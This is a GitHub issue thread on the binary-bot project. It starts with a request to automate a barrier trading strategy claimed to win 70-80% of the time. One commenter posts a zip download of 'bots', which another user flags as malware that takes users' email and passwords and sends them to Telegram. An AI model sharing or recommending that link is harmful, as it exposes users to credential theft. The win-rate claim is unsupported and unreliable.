### ISSUE TITLE
Trend barrier strategy win70-80%

### ISSUE THREAD

**Issue by adhamjon91** [binary-com/binary-bot#2626]
Please make a bot for this  strategy. 
https://drive.google.com/file/d/1HOCfxcDS2mHyQG21y-FZ6wXrYcGrpxwQ/view?usp=drivesdk

**Comment by Max-Profit** [comment]
> Please make a bot for this strategy.
> https://drive.google.com/file/d/1HOCfxcDS2mHyQG21y-FZ6wXrYcGrpxwQ/view?usp=drivesdk

Did you try it manually?

**Comment by adhamjon91** [comment]
> > Пожалуйста, сделайте бот для этой стратегии. 
> > https://drive.google.com/file/d/1HOCfxcDS2mHyQG21y-FZ6wXrYcGrpxwQ/view?usp=drivesdk
> 
> Вы пробовали это вручную?

Да пробовал у меня даже получилось.

**Comment by thommmaz** [comment]
In webtrader  barrier+200 and lower is not allowed, also barrier -200 and higher is not allowed. How does it work manually?

**Comment by adhamjon91** [comment]
> В WebTrader барьер + 200 и ниже не допускается, также барьер -200 и выше не допускается. Как это работает вручную?

0.2

**Comment by mbotbinary** [comment]
[all botbinary.zip](https://github.com/binary-com/binary-bot/files/4431436/all.botbinary.zip)

**Comment by cleberscr** [comment]
> [all botbinary.zip](https://github.com/binary-com/binary-bot/files/4431436/all.botbinary.zip)

@aaron-binary this guy again is sending those bots that asks for the email and password of the user and sends to the telegram, blocks this bro

**Comment by harshalkharose** [comment]
Hello Harshal kharose here,
Please solve this
In MACD Indicator How to set fast moving average line cross slow moving average line then buy and wait for the same for next same move.
Please help thank you & regards

**Comment by Rithea268** [comment]
D

**Comment by isave** [comment]
> > [all botbinary.zip](https://github.com/binary-com/binary-bot/files/4431436/all.botbinary.zip)
> 
> @aaron-binary this guy again is sending those bots that asks for the email and password of the user and sends to the telegram, blocks this bro

what the password
